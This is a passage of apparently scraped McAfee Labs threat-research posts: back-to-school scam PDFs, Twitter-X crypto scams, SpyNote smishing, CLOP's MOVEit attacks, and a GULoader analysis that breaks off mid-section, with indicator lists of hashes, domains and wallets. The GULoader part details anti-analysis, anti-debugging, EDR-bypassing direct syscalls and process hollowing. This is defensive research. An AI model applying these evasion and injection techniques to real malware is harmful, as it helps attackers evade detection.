kr.dmb.nine  실시간 TV  ea49ad38dd7500a6ac12613afe705eb1a4bcab5bcd77ef24f2b9a480a34e4f46  100,000+  실시간 TV  f09cff8a05a92ddf388e56ecd66644bf88d826c5b2a4419f371721429c1359a7  10,000+  실시간 TV  e8d2068d086d376f1b78d9e510a873ba1abd59703c2267224aa58d3fca2cacbd  100,000+  실시간 TV  1b64283e5d7e91cae91643a7dcdde74a188ea8bde1cf745159aac76a3417346e  50,000+  실시간 TV  bd0ac9b7717f710e74088df480bde629e54289a61fc23bee60fd0ea560d39952  100,000+  실시간 TV  d7dd4766043d4f7f640c7c3fabd08b1a7ccbb93eba88cf766a0de008a569ae4d  1,000+  실시간 TV  b84b22bc0146f48982105945bbab233fc21306f0f95503a1f2f578c1149d7e46  10,000+  실시간 TV  516032d21edc2ef4fef389d999df76603538d1bbd9d357a995e3ce4f274a9922  50,000+  실시간 TV  5d07a113ce389e430bab70a5409f5d7ca261bcdb47e4d8047ae7f3507f044b08  50,000+  실시간 TV  afc8c1c6f74abfadd8b0490b454eebd7f68c7706a748e4f67acb127ce9772cdb  100,000+  실시간 TV  6234eadfe70231972a4c05ff91be016f7c8af1a8b080de0085de046954c9e8e7  50,000+  음악다운  ded860430c581628ea5ca81a2f0f0a485cf2eeb9feafe5c6859b9ecc54a964b2  500,000+  음악다운  bede67693a6c9a51889f949a83ff601b1105c17c0ca5904906373750b3802e91  100,000+  음악다운  fee6cc8b606cf31e55d85a7f0bf7751e700156ce5f7376348e3357d3b4ec0957  1,000+  음악다운  b2c1caab0e09b4e99d5d5fd403c506d93497ddb2de3e32931237550dbdbe7f06  100,000+ 
com.alltrot.player  트로트 노래모음  469792f4b9e4320faf0746f09ebbcd8b7cd698a04eef12112d1db03b426ff70c  50,000+ 
com.trotmusic.player  트로트 노래모음  879014bc1e71d7d14265e57c46c2b26537a81020cc105a030f281b1cc43aeb77  5,000+  파도 MP3  f2bbe087c3b4902a199710a022adf8b57fd927acac0895ab85cfd3e61c376ea5  100,000+  파도 MP3  9c84c91f28eadd0a93ef055809ca3bceb10a283955c9403ef1a39373139d59f2  100,000+ 



The post Invisible Adware: Unveiling Ad Fraud Targeting Android Users appeared first on McAfee Blog.

The Season of Back to School Scams

2 August 2023 at 19:26

Authored by: Lakshya Mathur and Yashvi Shah 

As the Back-to-School season approaches, scammers are taking advantage of the opportunity to deceive parents and students with various scams. With the increasing popularity of online shopping and digital technology, people are more inclined to make purchases online. Scammers have adapted to this trend and are now using social engineering tactics, such as offering high discounts, free school kits, online lectures, and scholarships, to entice unsuspecting individuals into falling for their schemes. 

McAfee Labs has found the following PDFs targeting back-to-school trends. This blog is a reminder for parents on what to educate their children on and how not to fall victim to such fraud.

Fake captcha PDFs campaign 

McAfee Labs encountered a PDF file campaign featuring a fake CAPTCHA on its first page, to verify human interaction. The second page contained substantial content on back-to-school advice for parents and students, giving the appearance of a legitimate document. These tactics were employed to make the PDF seem authentic, entice consumers to click on the fake CAPTCHA link, and evade detection. 

Figure 1Fake CAPTCHA and scammy link 

Figure 2 – PDF Second Page

Figure 3 – Zoomed in content from Figure 2

As shown in Figure 1, there is a fake captcha image that, when clicked, redirects to a URL displayed at the bottom left of the figure. This URL has a Russian domain and goes through multiple redirections before reaching its destination. The scam URL contains the text “all hallows prep school uniform,” and leads to a malicious site that sets cookies, monitors user behavior, and collects interactions, sending the data to servers owned by the domain’s operators. 

Figures 2 and 3 display the second page of the PDF, designed to appear legitimate to users and spam and security scanners. 

In this campaign, we identified a total of 13 domains, with 11 being of Russian origin and 2 from South Africa. You can find the complete list of these domains in the final IOC (Indicators of Compromise) section. 

All domains were created between 2020 and 2021 and use Cloudflare’s name servers. 

Geographical Distribution 

These domains were discovered operating worldwide, targeting consumers across various countries. The United States and India stood out as the top countries where users were most often targeted. 

Figure 4 – Geographical distribution of all the scam domains 

What more to expect? 

As the season begins, the scenario is only the beginning of back-to-school scam season. Parents and students should remain vigilant against fraud, such as: 

  • Shopping scams: During back-to-school season, scammers employ various tactics: setting up fake online stores offering discounted school supplies, uniforms, and gadgets, but delivering substandard or nonexistent products; spreading fraudulent social media ads with enticing deals that lead to fake websites collecting personal information and payment details; and sending fake package delivery emails, tricking recipients into clicking on malicious links to perform phishing and malware attacks.  
  • Tax/Loan free scams: Scammers target students and parents with student loan forgiveness scams, offering false debt reduction programs in exchange for upfront payments or personal information. They also entice victims with fake scholarships or grants, prompting fees or sensitive data, while no genuine assistance exists. Unsolicited calls from scammers posing as government agencies or loan providers add to the deception, using high-pressure tactics to extract personal information or immediate payments. 
  • Identity theft: Scammers employ various identity theft tactics to exploit students and parents: attempting unauthorized access to school databases for personal information, creating fake enrollment forms to collect sensitive data, and sending phishing emails posing as educational institutions or retailers to trick victims into sharing personal information or login credentials. 
  • Deepfake AI Voice scams: Scammers might use deepfake AI technology to create convincing voice recordings of school administrators, teachers, or students. They can pose as school officials to deceive parents into making urgent payments or sharing personal information. Additionally, scammers might mimic students’ or teachers’ voices to solicit fraudulent fundraisers for fake school programs or claim that students have won scholarships or prizes to trick them into paying fees or revealing sensitive information. These scams exploit the trust and urgency surrounding back-to-school activities. 

How to Stay Protected? 

  • Be skeptical, if something appears to be too good to be true, it probably is.  
  • Exercise caution when registering or sharing personal information on questionable sites. 
  • Stay informed about these scams to safeguard yourself 
  • Maintain a skeptical approach towards unsolicited calls and emails. 
  • Keep your anti-virus and web protection up to date and perform regular full scans on your devices. 

IOC (Indicator of Compromise) 

Filetype/URL  Value 
PDF  474987c34461cb4bd05b81d040cae468ca5b88e891da4d944191aa819a86ff21 
Domain  traffine[.]ru 

The post The Season of Back to School Scams appeared first on McAfee Blog.

Scammers Follow the Rebranding of Twitter to X, to Distribute Malware

25 July 2023 at 15:28

Authored by: Vallabh Chole and Yerko Grbic

On July 23rd, 2023, Elon Musk announced that the social networking site, Twitter was rebranding as “X”. The news propelled Twitter and X to gain headlines and become the top trending topics on popular social media platforms. 

Scammers pounced on this opportunity and started renaming various hacked YouTube and other social media accounts to “twitter-x” and “twitter fund” to promote scam links with new X branding. 

Figure 1. Twitter-X-themed YouTube Live Stream by scammer 


Figure 2. Twitter X Crypto Scam 


This type of scam has been active for some time and uses an innovative approach to lure victims. To make this scam more authentic, attackers target famous Influencers with sponsorship emails that contain password-stealing malware as email attachments. When password stealer malware is executed, the influencers session cookies (unique access tokens) are stolen and uploaded to attacker-controlled systems. 

Figure 3. Malware Flow Chart  


After the influencers account has been compromised, the scammer starts to rename channels, in this case to “Twitter CEO” and then the scammers start to live stream an Elon Musk video on YouTube. They post web links for new scam sites in chat, and target YouTube accounts with a large number of subscribers. On other social media platforms, such as Instagram and Twitter, they use compromised accounts to follow users and post screenshots with captions, such as “Thanks Mr.Elon”. If we look for these terms on Instagram, we observe thousands of similar posts. Compromised accounts are also used to post videos for software/game applications, which are malware masquerading as legitimate software or games. These videos demonstrate how to download and execute files, which are common password-stealing malware, and distributed through compromised social media accounts.

Protection with McAfee+: 

 McAfee+ provides all-in-one online protection for your identity, privacy, and security. With McAfee+, you’ll feel safer online because you’ll have the tools, guidance, and support to take the steps to be safer online. McAfee protects against these types of scam sites with Web Advisor protection that detects malicious websites.

Figure 4. McAfee WebAdvisor detection 


Below is a detection heatmap for scam URL’s targeting twitter-x and promoting crypto scams  

Figure 5. Scam URL Detection Heatmap 


Figure 6. Password stealer Heatmap 


Indicators of Compromise: 

Scam Site  Crypto Type  Wallet   
twitter-x[.]org  ETH   0xB1706fc3671115432eC9a997F802aC79CD7f378a   
twitter-x[.]org  BTC   1KtgaAjBETdcXiAdGsXJMePT4AEGWqtsug   
twitter-x[.]org  USDT   0xB1706fc3671115432eC9a997F802aC79CD7f378a   
twitter-x[.]org  DOGE   DLCmD43eZ6hPxZVzc8C7eUL4w8TNrBMw9J   


The post Scammers Follow the Rebranding of Twitter to X, to Distribute Malware appeared first on McAfee Blog.

Android SpyNote attacks electric and water public utility users in Japan

21 July 2023 at 07:00

Authored by Yukihiro Okutomi 

McAfee’s Mobile team observed a smishing campaign against Japanese Android users posing as a power and water infrastructure company in early June 2023. This campaign ran for a short time from June 7. The SMS message alerts about payment problems to lure victims to a phishing website to infect the target devices with a remote-controlled SpyNote malware. In the past, cybercriminals have often targeted financial institutions. However, on this occasion, public utilities were the target to generate a sense of urgency and push victims to act immediately. Protect your Android and iOS mobile devices with McAfee Mobile Security.

Smishing Attack Campaign 

A phishing SMS message impersonating a power or water supplier claims a payment problem, as shown in the screenshot below. The URL in the message directs the victim to a phishing website to download mobile malware. 

Notice of suspension of power transmission because of non-payment of charges from a power company in Tokyo (Source: Twitter) 

Notice of suspension of water supply because of non-payment of charges from a water company in Tokyo (Source: Twitter) 


When accessed with a mobile browser, it will start downloading malware and display a malware installation confirmation dialog. 

The confirmation dialog of Spyware installation via browser (Source: Twitter) 

SpyNote malware 

SpyNote is a known family of malware that proliferated after its source code was leaked in October 2022. Recently, the malware was used in a campaign targeting financial institutions in January and targeting Bank of Japan in April 2023 

The SpyNote malware is remotely controlled spyware that exploits accessibility services and device administrator privileges. It steals device information and sensitive user information such as device location, contacts, incoming and outgoing SMS messages, and phone calls. The malware deceives users by using legitimate app icons to look real. 

Application Icons disguised by malware. 

After launching the malware, the app opens a fake settings screen and prompts the user to enable the Accessibility feature. When the user clicks the arrow at the bottom of the screen, the system Accessibility service settings screen is displayed. 

A fake setting screen (left), system setting screen (center and right) 

By allowing the Accessibility service, the malware disables battery optimization so that it can run in the background and automatically grants unknown source installation permission to install another malware without the user’s knowledge. In addition to spying on the victim’s device, it also steals two-factor authentication on Google Authenticator and Gmail and Facebook information from the infected device. 

Although the distribution method is different, the step of requesting Accessibility service after launching the app is similar to the case of the Bank of Japan that occurred in April. 

Scammers keep up with current events and attempt to impersonate well-known companies that have a reason to reach out to their customers. The mobile malware attack using SpyNote discovered this time targets mobile apps for life infrastructure such as electricity and water. One of the reasons for this is that electric bills and water bills, which used to be issued on paper, are now managed on the web and mobile app. If you want to learn about smishing, consult this article “What Is Smishing? Here’s How to Spot Fake Texts and Keep Your Info Safe”. McAfee Mobile Security detects this threat as Android/SpyNote and alerts mobile users if it is present and further protects them from any data loss. For more information, visit McAfee Mobile Security. 

Indicators of compromise (IoC) 

C2 Server: 


Malware Samples: 

SHA256 Hash  Package name  Application name 
075909870a3d16a194e084fbe7a98d2da07c8317fcbfe1f25e5478e585be1954  com.faceai.boot  キャリア安全設定 
e2c7d2acb56be38c19980e6e2c91b00a958c93adb37cb19d65400d9912e6333f  com.faceai.boot  東京電力 
a532c43202c98f6b37489fb019ebe166ad5f32de5e9b395b3fc41404bf60d734  com.faceai.boot  東京電力TEPCO 
cb9e6522755fbf618c57ebb11d88160fb5aeb9ae96c846ed10d6213cdd8a4f5d  com.faceai.boot  東京電力TEPCO 
59cdbe8e4d265d7e3f4deec3cf69039143b27c1b594dbe3f0473a1b7f7ade9a6  com.faceai.boot  東京電力TEPCO 
8d6e1f448ae3e00c06983471ee26e16f6ab357ee6467b7dce2454fb0814a34d2  com.faceai.boot  東京電力TEPCO 
5bdbd8895b9adf39aa8bead0e3587cc786e375ecd2e1519ad5291147a8ca00b6  com.faceai.boot  東京電力TEPCO 
a6f9fa36701be31597ad10e1cec51ebf855644b090ed42ed57316c2f0b57ea3c  com.faceai.boot  東京電力TEPCO 
f6e2addd189bb534863afeb0d06bcda01d0174f5eac6ee4deeb3d85f35449422  com.faceai.boot  東京電力TEPCO 
755585571f47cd71df72af0fad880db5a4d443dacd5ace9cc6ed7a931cb9c21d  com.faceai.boot  東京電力TEPCO 
2352887e3fc1e9070850115243fad85c6f1b367d9e645ad8fc7ba28192d6fb85  com.faceai.boot  東京電力TEPCO 
90edb28b349db35d32c0190433d3b82949b45e0b1d7f7288c08e56ede81615ba  com.faceai.boot  東京電力TEPCO 
513dbe3ff2b4e8caf3a8040f3412620a3627c74a7a79cce7d9fab5e3d08b447b  com.faceai.boot  東京電力TEPCO 
f6e2addd189bb534863afeb0d06bcda01d0174f5eac6ee4deeb3d85f35449422  com.faceai.boot  東京電力TEPCO 
0fd87da37712e31d39781456c9c1fef48566eee3f616fbcb57a81deb5c66cbc1  com.faceai.boom  東京水道局アプリ 
acd36f7e896e3e3806114d397240bd7431fcef9d7f0b268a4e889161e51d802b  com.faceai.boom  東京水道局アプリ 
91e2f316871704ad7ef1ec74c84e3e4e41f557269453351771223496d5de594e  com.faceai.boom  東京水道局アプリ 



The post Android SpyNote attacks electric and water public utility users in Japan appeared first on McAfee Blog.

CLOP Ransomware exploits MOVEit software

21 June 2023 at 09:00

Authored by: Abhishek Karnik and Oliver Devane

You may have heard recently in the news that several organizations, including banks, federal agencies, and corporate entities, have suffered data breaches due to a series of ransomware attacks initiated by the Clop hacker group (aka CLOP, CL0p), that leveraged a vulnerability in MOVEit software.

Three critical vulnerabilities (CVE-2023-34362, CVE-2023-35036 and CVE-2023-35708) have been reported in the software. However, the group is only known to have leveraged one, CVE-2023-34362 to obtain unauthorized access to sensitive data. The vulnerabilities, if exploited, result from a structured query language (SQL) injection attack, that allows attackers access to databases hosted by the MOVEit application. 

SQL injection is a technique by which attackers exploit vulnerabilities that allows the injection of malicious code into an application to view or modify a database (in this case MOVEit) 

Ransomware is a certain class of malware that tries to extort money as a ransom payment. The typical tactics for such malware are: 

  1. Encrypt files on a machine and demand payment for file decryption.
  2. Siphon important business, confidential or sensitive data, and then demand a payment to prevent public disclosure of such data. 

While there were no reports of file encryption in this wave, the malicious actors stole files from the impacted companies and are now extorting them by demanding payment to prevent the hackers from releasing the files to the public. It should be noted that this is not the first time Clop has used these tactics. 

How did this attack occur and how does this impact you? 

The U.S. Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) first warned of this attack via a press release on June 7, 2023. The attackers exploited a zero-day threat in MOVEIt software.  Internet-facing MOVEit transfer web applications were compromised through the vulnerabilities listed above and infected with malware that then subsequently stole data from underlying MOVEit databases. The result was that any file that was transferred using MOVEit could also have been stolen by malicious actors. Once the data was siphoned, the attackers contacted the organizations to inform them that they were victims of an attack and that the files would be published publicly if a ransom wasn’t paid on time.  

The impact of this is that potentially sensitive files that may have contained intellectual property or personally identifiable customer data could be made available on the Internet. This, of course, would have severe ramifications for not only the impacted organizations, but also for customers or users who had provided information to them.  

What can you do? 

If you operate a business that utilizes the MOVEit software, it is imperative that you follow guidance provided by Progress Software and CISA. 

It’s unlikely that individual consumers will be directly impacted by the CLOP malware. However, there is a possibility that you may have been indirectly impacted if an organization you have previously subscribed to or provided information to is a victim. This FAQ and blog by McAfee contains great details on what steps you should follow if your data is part of a data breach.  

Such breaches can also have a ripple effect where malicious actors who weren’t directly involved with the ransomware attack may take advantage of the event, to target potential victims with scams. Be cautious of emails or other correspondence claiming to be from a company that has been impacted by this Ransomware attack. Double-check the email address and verify any links that are present in the emails. Read more about how to recognize and protect yourself from phishing 

The post CLOP Ransomware exploits MOVEit software appeared first on McAfee Blog.

GULoader Campaigns: A Deep Dive Analysis of a highly evasive Shellcode based loader

9 May 2023 at 17:50

Authored by: Anandeshwar Unnikrishnan

Stage 1: GULoader Shellcode Deployment 

In recent GULoader campaigns, we are seeing a rise in NSIS-based installers delivered via E-mail as malspam that use plugin libraries to execute the GU shellcode on the victim system. The NSIS scriptable installer is a highly efficient software packaging utility. The installer behavior is dictated by an NSIS script and users can extend the functionality of the packager by adding custom libraries (dll) known as NSIS plugins. Since its inception, adversaries have abused the utility to deliver malware. 

NSIS stands for Nullsoft Scriptable Installer. NSIS installer files are self-contained archives enabling malware authors to include malicious assets along with junk data. The junk data is used as Anti-AV / AV Evasion technique. The image below shows the structure of an NSIS GULoader staging executable archive.


The NSIS script, which is a file found in the archive, has a file extension .nsi as shown in the image above. The deployment strategy employed by the threat actor can be studied by analyzing the NSIS script commands provided in the script file. The image shown below is an oversimplified view of the whole shellcode staging process. 

The file that holds the encoded GULoader shellcode is dropped on to victim’s disc based on the script configuration along with other data. Junk is appended at the beginning of the encoded shellcode. The encoding style varies from sample to sample. But in all most all the cases, it’s a simple XOR encoding. As mentioned before, the shellcode is appended to junk data, because of this, an offset is used to retrieve encoded GULoader shellcode. In the image, the FileSeek NSIS command is used to do proper offsetting. Some samples have unprotected GULoader shellcode appended to junk data. 


A plugin used by the NSIS installer is nothing but a DLL which gets loaded by the installer program at runtime and invokes functions exported by the library Two DLL files are dropped in user’s TEMP directory, in all analyzed samples one DLL has a consistent name of system.dll and name of the other one varies.   

The system.dll is responsible for allocating memory for the shellcode and its execution. The following image shows how the NSIS script calls functions in plugin libraries.


The system.dll has the following exports as shown the in the image below. The function named “Call” is being used to deploy the shellcode on victim’s system. 

  • The Call function exported by system.dll resolves following functions dynamically and execute them to deploy the shellcode. 
  • CreateFile – To read the shellcode dumped on to disk by the installer. As part of installer set up, all the files seen in the installer archive earlier are dumped on to disk in new directory created in C:\ drive. 
  • VirtualAlloc – To hold the shellcode in the RWX memory. 
  • SetFilePointer – To seek the exact position of the shellcode in the dumped file. 
  • ReadFile – To read the shellcode.  
  • EnumResourceTypesA – Execution via callback mechanism. The second parameter is of the type ENUMRESTYPEPROCA which is simply a pointer to a callback routine. The address where the shellcode is allocated in the memory is passed as the second argument to this API leading to execution of the shellcode. Callback functions parameters are good resources for indirect execution of the code.   

Vectored Exception Handling in GULoader 

The implementation of the exception handling by the Operating System provides an opportunity for the adversary to take over execution flow. The Vectored Exception Handling on Windows provides the user with ability to register custom exception handler, which is simply a code logic that gets executed at the event of an exception. The interesting thing about handling exceptions is that the way in which the system resumes its normal execution flow of the program after the event of exception. Adversaries exploit this mechanism and take ownership of the execution flow. Malware can divert the flow to the code which is under its control when the exception occurs. Normally it is employed by the malware to achieve following goals: 

  • Hooking 
  • Covert code execution and anti-analysis 

The GuLoader employs the VEH mainly for obfuscating the execution flow and to slow down the analysis. This section will cover the internals of Vectored exception handling on Windows and investigates how GUloader is abusing the VEH mechanism to thwart any analysis efforts.  

  • The Vectored Exception Handling (VEH) is an extension of Structured Exception Handling (SEH) with which we can add a vectored exception handler which will be called despite of our position in a call frame, simply put VEH is not frame-based. 
  • VEH is abused by malware, either to manipulate the control flow or covertly execute user functions. 
  • Windows provides AddVectoredExceptionHandler Win32 API to add custom exception handlers. The function signature is shown below. 

The Handler routine is of the type PVECTORED_EXCEPTION_HANDLER. Further checking the documentation, we can see the handler function takes a pointer to _EXCEPTION_POINTERS type as its input as shown in the image below. 


The _EXCEPTION_POINTERS type holds two important structures; PEXCEPTION_RECORD and PCONTEXT. PEXCEPTION_RECORD contains all the information related to exception raised by the system like exception code etc. and PCONTEXT structure holds CPU register (like RIP/EIP, debug registers etc.) values or state of the thread captured when exception occurred. 


  • This means the exception handler can access both ExceptionRecord and ContextRecord. Here from within the handler one can tamper with the data stored in the ContextRecord, thus manipulating EIP/RIP to control the execution flow when user application resumes from exception handling.    
  • There is one interesting thing about exception handling, the execution to the application is given back via NtContinue native routine. Exception dispatch routines call the handler and when handler returns to dispatcher, it passes the ContextRecord to the NtContinue and execution is resumed from the EIP/RIP in the record. On a side note, this is an oversimplified explanation of the whole exception handling process. 

Vectored Handler in GULoader 

  • GULoader registers a vectored exception handler via RtlAddVectoredExceptionHandler native routine.  The below image shows the control flow of the handler code. Interestingly most of the code blocks present here are junk added to thwart the analysis efforts.  


  • The GULoader’s handler implementation is as follows (disregarding the junk code). 
  • Reads ExceptionInfo passed to the handler by the system. 
  • Reads the ExceptionCode from ExceptionRecord structure. 
  • Checks the value of ExceptionCode field against the computed exception codes for STATUS_ACCESS_VIOLATION, STATUS_BREAKPOINT and STATUS_SINGLESTEP. 
  • Based on the exception code, malware takes a branch and executes code that modifies the EIP. 



The GULoader sets the trap flag to trigger single stepping intentionally to detect analysis. The handler code gets executed as discussed before, a block of code is executed based on the exception code. If the exception is single stepping, status code is 0x80000004, following actions take place:

  • The GULoader reads the ContextRecord and retrieves EIP value of the thread. 
  •  Increments the current EIP by 2 and reads the one byte from there. 
  • Performs an XOR on the one-byte data fetched from step before and a static value. The static value changes with samples. In our sample value is 0x1A. 
  • The XOR’ed value is then added to the EIP fetched from the ContextRecord. 
  • Finally, the modified EIP value from prior step is saved in the ContextRecord and returns the control back to the system(dispatcher). 
  • The malware has the same logic for the access violation exception. 


  • When the shellcode is executed without debugger, INT3 instruction invokes the vectored exception handler routine, with an exception of EXCEPTION_BREAKPOINT, handler computes EIP by incrementing the EIP by 1 and fetching the data from incremented location. Later XORing the fetched data with a constant in our case 0x1A. The result is added to current EIP value. The logic implemented for handling INT3 exceptions also scan the program code for 0xCC instructions put by the researchers. If 0xCC are found that are placed by researchers then EIP is not calculated properly. 


EIP Calculation Logic Summary 

Trigger via interrupt instruction (INT3)  eip=((ReadByte(eip+1)^0x1A)+eip) 
Trigger via Single Stepping(PUSHFD/POPFD)  eip=((ReadByte(eip+2)^0x1A)+eip) 

*The value 0x1A changes with samples 

Detecting Abnormal Execution Flow via VEH 

  • The shellcode is structured in such a way that the malware can detect abnormal execution flow by the order in which exception occurred at runtime. The pushfd/popfd instructions are followed by the code that when executed throws STATUS_ACCESS_VIOLATION. When program is executed normally, the execution will not reach the code that follows the pushfd/popfd instruction block, thus raising only STATUS_SINGLESTEP. When accidently stepped over the pushfd/popfd block in debugger, the STATUS_SINGLESTEP is not thrown at the debugger as it suppreses this because the debugger is already single stepping through the code, this is detected by the handler logic when we encounter code that follows the pushfd/popfd instruction block wich throws a STATUS_ACCESS_VIOLATION. Now it runs into a nested exception situation (the access violation followed by suppressed single stepping exception via trap). Because of this, whenever an access violation occurs, the handler routine checks for nested exception information in _EXCEPTION_POINTERS structure as discussed in the beginning. 

Below image shows this the carefully laid out code to detect analysis. 


The Egg hunting: VEH Assisted Runtime Padding 

One interesting feature seen in GULoader shellcode in the wild is runtime padding. Runtime padding is an evasive behavior to beat automated scanners and other security checks employed at runtime. It delays the malicious activities performed by the malware on the target system.  

  • The egg value in the analyzed sample is 0xAE74B61.  
  • It initiates a search for this value in its own data segment of the shellcode. 
  • Don’t forget the fact that this is implemented via VEH handler. This search itself adds 0.3 million of VEH iteration on top of regular VEH control manipulation employed in the code. 
  • The loader ends this search when it retrieves the address location of the egg value. To make sure the value is not being manipulated by any means by the researcher, it performs two additional checks to validate the egg location. 
  • If the check fails, the search continues. The process of retrieving the location of the egg is shown in the image below.  

  • As mentioned above, the validity of the egg location is checked by retrieving byte values from two offsets: one is 4 bytes away from the egg location and the value is 0xB8. The other is at 9 bytes from the egg location and the value is 0xC3. This check needs to be passed for the loader to proceed to the next stage of infection. Core malware activities are performed after this runtime padding loop. 

 The following images show the egg location validity checks performed by GULoader. The values 0xB8 and 0xC3 are checked by using proper offsets from the egg location. 


Stage 2: Environment Check and Code Injection  

In the second stage of the infection chain, the GULoader performs anti-analysis and code injection. Major anti-analysis vectors are listed below. After making sure that shellcode is not running in a sandbox, it proceeds to conduct code injection into a newly spawned process where stage 3 is initiated to download and deploy actual payload. This payload can be either commodity stealer or RAT.  

Anti-analysis Techniques  

  • Employs runtime padding as discussed before. 
  • Scans whole process memory for analysis tool specific strings 
  • Uses DJB2 hashing for string checks and dynamic API address resolution. 
  • Strings are decoded at runtime 
  • Checks if qemu is installed on the system by checking the installation path: 
  • C:\\Program Files\\qqa\\qqa.exe 
  • Patches the following APIs: 
  • DbgUIRemoteBreakIn 
  • The function’s prologue is patched with ExitProcess call 
  • LdrLoadDll 
  • The initial bytes are patched with instruction “mov edi edi” 
  • DbgBreakPoint 
  • Patches with instruction nop 
  • Clears hooks placed in ntdll.dll by security products or researcher for the analysis. 
  • Window Enumeration via EnumWindows 
  • Hides the shellcode thread from the debugger via ZwSetInformationThread by passing 0x11 (ThreadHideFromDebugger) 
  • Device driver enumeration via EnumDeviceDrivers andGetDeviceDriverBaseNameA 
  • Installed software enumeration via MsiEnumProductsA and MsiGetProductInfoA 
  • System service enumeration via OpenSCManagerA and EnumServiceStatusA 
  • Checks use of debugging ports by passing ProcessDebugPort (0x7) class to NtQueryInformationProcess 
  • Use of CPUID and RDTSC instructions to detect virtual environments and instrumentation. 

Anti-dump Protection 

Whenever GULoader invokes a Win32 api, the call is sandwiched between two XOR loops as shown in the image below.  The loop prior to the call encoded the active shellcode region where the call is taking place to prevent the memory from getting dumped by the security products based on event monitoring or api calls. Following the call, the shellcode region is decoded again back to normal and resumes execution. The XOR key used is a word present in the shellcode itself. 


String Decoding  

This section covers the process undertaken by the GUloader to decode the strings at the runtime. 

  • The NtAllocateVirtualMemory is called to allocate a buffer to hold the encoded bytes. 
  • The encoded bytes are computed by performing various arithmetic and logical operations on static values embedded as operands of assembly instructions. Below image shows the recovery of encoded bytes via various mathematical and logical operations. The EAX points to memory buffer, where computed encoded values get stored. 


The first byte/word is reserved to hold the size of the encoded bytes. Below shows a 12 byte long encoded data being written to memory. 

Later, the first word gets replaced by the first word of the actual encoded data. Below image shows the buffer after replacing the first word. 

The encoded data is fully recovered now, and malware proceeds to decode it. For decoding the simple XOR is employed, and key is present in the shellcode. The assembly routine that does the decoding is shown in the image below. Each byte in the buffer is XORed with the key. 


The result of the XOR operation is written to same memory buffer that holds the encoded data. A final view of the memory buffer with decoded data is shown below. 

The image shows the decoding the string “psapi.dll”, later this string is used in fetching the addresses of various functions to employ anti-analysis.  


The stage 2 culminates in code injection, to be specific GULoader employs a variation of the process hollowing technique, where a benign process is spawned in a suspended state by the malware stager process and proceeds to overwrite the original content present in the suspended process with malicious content, later the state of the thread in the suspended process is changed by modifying processor register values like EIP and finally the process resumes its execution. By controlling EIP, malware can now direct the control flow in the spawned process to a desired code location. After a successful hollowing, the malware code will be running under the cover of a legit application.  

The variation of hollowing technique employed by the GULoader doesn’t replace the file contents, but instead injects the same shellcode and maps the memory in the suspended process. Interestingly, GULoader employs an additional technique if the hollowing attempt fails. More details are covered in the following section.  

Listed below Win32 native APIs are dynamically resolved at runtime to perform the code injection. 

  • NtCreateSection 
  • ZwMapViewOfSection 
  • NtWriteVirtualMemory 
  • ZwGetContetThread 
  • NtSetContextThread 
  • NtResumeThread   

Overview of Code Injection 

  • Initially image “%windir%\Microsoft.NET\Framework\version on 32-bit systems\<version>\CasPol.exe” is spawned in suspended mode via CreateProcessInternalW native API. 
  • The Gu loader retrieves a handle to the file “C:\Windows\SysWOW64\iertutil.dll” which is used in section creation. The section object created via NtCreateSection will be backed by iertutil.dll.  
  • This behavior is mainly to avoid suspicion, a section object which is not backed by any file may draw unwanted attention from security systems.  
  • The next phase in the code injection is the mapping of the view created on the section backed by the iertutil.dll into the spawned CasPol.exe process. Once the view is successfully mapped to the process, malware can inject the shellcode in the mapped memory and resume the process thus initiating stage 3. The native api ZwMapViewOfSection is used to perform this task. Following the execution of the above API, the malware checks the result of the function call against the below listed error statuses. 
  • 40000003 (STATUS_IMAGE_NOT_AT_BASE). 
  • If the mapping is unsuccessful and status code returned by ZwMapViewOfSection matches with any of the code mentioned above, it has a backup plan. 
  • The GuLoader calls NtAllocateVirtualMemory by directly calling the system call stub which is normally found in ntdll.dll library to bypass EDR/AV hooks. The memory is allocated in the remote CasPol.exe process with an RWX memory protection. Following image shows the direct use of NtAllocateVirtualMemory system call. 

After memory allocation, it writes itself into remote process via NtWriteVirtualMemory as discussed above. GULoader shellcodes taken from the field are bigger in size,  samples taken for this analysis are all greater than 20 mb. In samples analyzed, the buffer size allocated to hold the shellcode is 2950000 bytes. The below image shows the GuLoader shellcode in the memory. 


Misleading Entry point  

  • The GULoader is highly evasive in nature, if abnormal execution flow is detected with help of employed anti-analysis vectors, the EIP and EBX fields of thread context structure (of CasPol.exe process) will be overwritten with a decoy address, which is required for the stage 3 of malware execution. The location ebp+4 is used to hold the entry point despite of the fact whether program is being debugged or not. 
  • The Gu loader uses ZwGetContextThread and NtSetContextThread routines to accomplish modification of the thread state. The CONTEXT structure is retrieved via ZwGetContextThread, the value [ebp+14C] is used as the entry point address. The current EIP value held in the EIP field in the context structure of the thread will be changed to a recalculated address based on value at ebp+4. Below image shows the RVA calculation.  The base address of the executing shellcode (stage 2) is subtracted from the virtual address [ebp+4] to obtain RVA.  


The RVA is added to the base address of the newly allocated memory in the CasPol.exe process to obtain new VA which can be used in the remote process. The new VA is written into EIP and EBX field in the thread context structure of the CasPol.exe process retrieved via ZwGetContextThread. Below image shows the modified context structure and value of EIP.  


Finally, by calling ZwSetContextThread, the changes made to the CONTEXT structure is committed in the target thread of CasPol.exe process. The thread is resumed by calling NtResumeThread. The CasPol.exe resumes execution and performs stage 3 of the infection chain. 

Stage 3: Payload Deployment  

The GULoader shellcode resumes execution from within a new host process, in this report, analyzed samples inject the shellcode either into the same process spawned as a child process or caspol.exe. Stage3 performs all the anti-analysis once again to make sure this stage is not being analyzed. After all checks, GUloader proceeds to perform stage3 activities by decoding the encoded C2 string in the memory as shown in the image below. The decoding method is the same as discussed before. 

Later the addresses of following functions are resolved dynamically by loading wininet.dll: 

  • InternetOpenA 
  • InternetSetOptionA 
  • InternetOpenUrlA 
  • InternetReadFile 
  • InternetCloseHandle. 

The below image shows the response from the content delivery network (cdn) server where the final payload is stored. In this analysis, a payload of size 0x2E640 bytes is sent to the loader. Interestingly, the first 40 bytes are ignored by the loader. The actual payload starts from the offset 40 which is highlighted in the image. 


The cdn server is well protected, it only serves to clients with proper headers and cookies. If these are not present in the HTTP request, the following message is shown to the user. 

Final Payload 

Quasi Key Generation 

The first step in decoding the the downloaded final payload by the GUloader is generating a quasi key which will be later used in decoding the actual key embeded in the GULoader shellcode. The encoded embeded key size is 371 bytes in analysed sample. The process of quasi key generation is as follows: 

  • The 40th and 41st bytes (word) are retrived from the download buffer in the memory. 
  • The above word is XORed with the first word of the encoded embeded key along and a counter value. 
